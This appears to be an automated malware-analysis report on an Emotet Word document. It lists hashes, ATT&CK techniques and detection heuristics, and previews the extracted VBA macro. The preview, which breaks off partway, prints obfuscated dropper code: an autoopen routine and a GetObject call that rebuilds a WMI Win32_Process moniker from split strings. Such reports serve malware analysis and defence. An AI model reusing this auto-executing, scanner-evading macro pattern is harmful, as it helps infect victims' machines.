Emotet Office (OLE) malware analysis — malicious · 1c60cd89f7e71dc9

MALICIOUS

Office (OLE)

103.9 KB Created: 2019-05-02 07:58:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 2c6802fddfab583247565a70def8336c SHA-1: a1c98199f615a308dd8bc909b2a3cb4f7e019780 SHA-256: 1c60cd89f7e71dc9867ec2c1ad7327f555e7cfb26315267798ee54d4e414eb57

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of AutoOpen and GetObject, along with a critical finding of WMI Win32_Process creation via obfuscated strings like 'winmgmts'. This strongly suggests the macro is designed to execute a payload, consistent with Emotet's typical behavior of downloading and running further malicious code. The ClamAV signature also confirms this identification.

Heuristics 8

ClamAV: Doc.Dropper.Emotet-6960132-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-6960132-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8564 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8564 bytes
SHA-256: `311a9482aab794136513899ef095d631a724a9459c72d03dae56796bf6b71fdd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rCUQAAB" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "cB111k" Attribute VB_Base = "0{A92E610B-4206-44B0-8F2A-9D6883749F2C}{4B76A9A5-7CCC-4ECF-8F50-D5379EA09A3D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "zAGAwUAD" Attribute VB_Name = "dAA4AAk" Attribute VB_Name = "KQQZckUA" Attribute VB_Name = "c4oDZX" Attribute VB_Base = "0{F0857EF8-C2C9-4594-AE2B-EB01CB4256D7}{14961E62-FF42-4701-B258-BD9C33F9A32E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "EXDCD_" Function OCBAU1(UUGD1QQA) Select Case FZZAQX Case lDcAxA_ = UDAwkXxB = Sgn(200856712) Case XxAQ41AU = TQCw4c Case LB_kUxAc = Log(OZABA4xU) Case CAQA1Gx = CBool(319167043) Case bwUAcBDA = 329387077 Case fDAkAAQc = CDate(uZoBZA) End Select Select Case oAkXAcQ Case M_GCAwAU = qABAAXUQ = Sgn(804536849) Case SQADAxU = nGABBDoA Case UGQBDA = Log(zxDwcx1o) Case tGwoAACA = CBool(406270910) Case q1AwZQ = 944159749 Case TAB1AA4Q = CDate(NCUcQoDQ) End Select Set OCBAU1 = CVar(UUGD1QQA) Select Case mAx__UB Case AAAAk1 = oUwABCA = Sgn(829431098) Case tBUQ4B = rQAACQU Case vADxAkwD = Log(CXUcAB4G) Case LB1B4_A = CBool(199094074) Case XUAkAXAD = 738858058 Case kDcAA_A = CDate(SkQ14D) End Select Select Case ncGABD Case Gc1XDUc = GBAAA4UA = Sgn(98233986) Case iDQAw1k = MAUCGAQA Case KADABAA = Log(TAAABZQA) Case wQ4UAUZA = CBool(692514746) Case r4AABA1w = 951950145 Case KAXZAok = CDate(QACDGACk) End Select End Function Sub autoopen() Select Case wXQ41Q4 Case LkAAAc = jk_GAAC4 = Sgn(71459420) Case MAAAxA = SGDkAUGZ Case TAU4CkC = Log(iUAcwQ_C) Case roCA1B = CBool(161147654) Case l1AAcDUZ = 720077665 Case wA_o4AQ = CDate(f1_UAk) End Select Select Case EGD4DDD Case nQ4QBoA = jQcAAAA1 = Sgn(582743940) Case KA_AAB = sXQ_cAU Case wc1AAkcA = Log(sCQDZAAA) Case qUAZZQ = CBool(739747204) Case BAACAD = 603231392 Case I1ZQUAZ_ = CDate(PQAxDo) End Select Select Case HxAUBAB Case wA1BAU = HAoXAD = Sgn(699949487) Case tGBo1AoG = NDQXDAA Case PAUAAC = Log(Z1UA4kA) Case JwGAUX = CBool(674716261) Case oDAZQBAD = 280696191 Case NQCBAUD = CDate(hAcAw_CA) End Select Call iAAwAXoQ Select Case pA1DAX Case ICkAAAA_ = Iw1AXA = Sgn(909803126) Case EQ_AxBD = wAxBQxQZ Case RAkABQ = Log(nACD_AA) Case lGkQAA = CBool(462894309) Case MA_1CUAA = 559402566 Case PoZQA4BA = CDate(NXAUABB) End Select Select Case FkA4AQUU Case C_wACCZ = dwUAAA = Sgn(100039355) Case BcU1_QAB = AUUAxZ Case CAADADQA = Log(tU_ADUGX) Case AAUk4ADU = CBool(859094886) Case mUwAAAC = 838082757 Case GAAcCUD = CDate(MA_4A4) End Select End Sub Attribute VB_Name = "hQAQCA_" Function iAAwAXoQ() On Error Resume Next Select Case sAA1oBA Case SXXADAoA = zCQADZ = Sgn(470924311) Case QCACDcD = YoZADA Case kUBDwDDA = Log(EZQQUAZ) Case cwBQ1QUA = CBool(6498399) Case fAkAADAc = 92771722 Case BAAcAAU_ = CDate(kUAQB4Q4) End Select Select Case howUUDUU Case nwZkZBo = u1DoAX = Sgn(475782560) Case DwGUUx = NADZUk Case ZAABCx = Log(VGQBxBX) Case hAXADB = CBool(464226375) Case PAAQZA = 130504987 Case nAQkAx = CDate(lZDAGAkZ) End Select Select Case ioUZ1CAD Case UDGAADAU = PAQkQA = Sgn(746428862) Case zAwBAQ1 = IwGw_DAX Case iAAwAkB = Log(fCZwAA) Case HAo1cx4Q = CBool(60508244) Case NAXADA = 518589997 Case BZAAACAU = CDate(B_ZUQU) End Select Set XAAkCU = OCBAU1(GetObject("winm" + "g" + "mts:W" + "in32_Process" + "Sta" + "rtup")) Select Case wAQ4AU Case pAoBkwQA = r4ACGQB = Sgn(290371112) ... (truncated)

SHA-256: 311a9482aab794136513899ef095d631a724a9459c72d03dae56796bf6b71fdd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rCUQAAB"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "cB111k"
Attribute VB_Base = "0{A92E610B-4206-44B0-8F2A-9D6883749F2C}{4B76A9A5-7CCC-4ECF-8F50-D5379EA09A3D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zAGAwUAD"

Attribute VB_Name = "dAA4AAk"

Attribute VB_Name = "KQQZckUA"

Attribute VB_Name = "c4oDZX"
Attribute VB_Base = "0{F0857EF8-C2C9-4594-AE2B-EB01CB4256D7}{14961E62-FF42-4701-B258-BD9C33F9A32E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EXDCD_"
Function OCBAU1(UUGD1QQA)
   Select Case FZZAQX
Case lDcAxA_ = UDAwkXxB = Sgn(200856712)
Case XxAQ41AU = TQCw4c
Case LB_kUxAc = Log(OZABA4xU)
Case CAQA1Gx = CBool(319167043)
Case bwUAcBDA = 329387077
Case fDAkAAQc = CDate(uZoBZA)
End Select
   Select Case oAkXAcQ
Case M_GCAwAU = qABAAXUQ = Sgn(804536849)
Case SQADAxU = nGABBDoA
Case UGQBDA = Log(zxDwcx1o)
Case tGwoAACA = CBool(406270910)
Case q1AwZQ = 944159749
Case TAB1AA4Q = CDate(NCUcQoDQ)
End Select
Set OCBAU1 = CVar(UUGD1QQA)
   Select Case mAx__UB
Case AAAAk1 = oUwABCA = Sgn(829431098)
Case tBUQ4B = rQAACQU
Case vADxAkwD = Log(CXUcAB4G)
Case LB1B4_A = CBool(199094074)
Case XUAkAXAD = 738858058
Case kDcAA_A = CDate(SkQ14D)
End Select
   Select Case ncGABD
Case Gc1XDUc = GBAAA4UA = Sgn(98233986)
Case iDQAw1k = MAUCGAQA
Case KADABAA = Log(TAAABZQA)
Case wQ4UAUZA = CBool(692514746)
Case r4AABA1w = 951950145
Case KAXZAok = CDate(QACDGACk)
End Select
End Function
Sub autoopen()
   Select Case wXQ41Q4
Case LkAAAc = jk_GAAC4 = Sgn(71459420)
Case MAAAxA = SGDkAUGZ
Case TAU4CkC = Log(iUAcwQ_C)
Case roCA1B = CBool(161147654)
Case l1AAcDUZ = 720077665
Case wA_o4AQ = CDate(f1_UAk)
End Select
   Select Case EGD4DDD
Case nQ4QBoA = jQcAAAA1 = Sgn(582743940)
Case KA_AAB = sXQ_cAU
Case wc1AAkcA = Log(sCQDZAAA)
Case qUAZZQ = CBool(739747204)
Case BAACAD = 603231392
Case I1ZQUAZ_ = CDate(PQAxDo)
End Select
   Select Case HxAUBAB
Case wA1BAU = HAoXAD = Sgn(699949487)
Case tGBo1AoG = NDQXDAA
Case PAUAAC = Log(Z1UA4kA)
Case JwGAUX = CBool(674716261)
Case oDAZQBAD = 280696191
Case NQCBAUD = CDate(hAcAw_CA)
End Select
Call iAAwAXoQ
   Select Case pA1DAX
Case ICkAAAA_ = Iw1AXA = Sgn(909803126)
Case EQ_AxBD = wAxBQxQZ
Case RAkABQ = Log(nACD_AA)
Case lGkQAA = CBool(462894309)
Case MA_1CUAA = 559402566
Case PoZQA4BA = CDate(NXAUABB)
End Select
   Select Case FkA4AQUU
Case C_wACCZ = dwUAAA = Sgn(100039355)
Case BcU1_QAB = AUUAxZ
Case CAADADQA = Log(tU_ADUGX)
Case AAUk4ADU = CBool(859094886)
Case mUwAAAC = 838082757
Case GAAcCUD = CDate(MA_4A4)
End Select
End Sub

Attribute VB_Name = "hQAQCA_"
Function iAAwAXoQ()
On Error Resume Next
   Select Case sAA1oBA
Case SXXADAoA = zCQADZ = Sgn(470924311)
Case QCACDcD = YoZADA
Case kUBDwDDA = Log(EZQQUAZ)
Case cwBQ1QUA = CBool(6498399)
Case fAkAADAc = 92771722
Case BAAcAAU_ = CDate(kUAQB4Q4)
End Select
   Select Case howUUDUU
Case nwZkZBo = u1DoAX = Sgn(475782560)
Case DwGUUx = NADZUk
Case ZAABCx = Log(VGQBxBX)
Case hAXADB = CBool(464226375)
Case PAAQZA = 130504987
Case nAQkAx = CDate(lZDAGAkZ)
End Select
   Select Case ioUZ1CAD
Case UDGAADAU = PAQkQA = Sgn(746428862)
Case zAwBAQ1 = IwGw_DAX
Case iAAwAkB = Log(fCZwAA)
Case HAo1cx4Q = CBool(60508244)
Case NAXADA = 518589997
Case BZAAACAU = CDate(B_ZUQU)
End Select
Set XAAkCU = OCBAU1(GetObject("winm" + "g" + "mts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case wAQ4AU
Case pAoBkwQA = r4ACGQB = Sgn(290371112)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.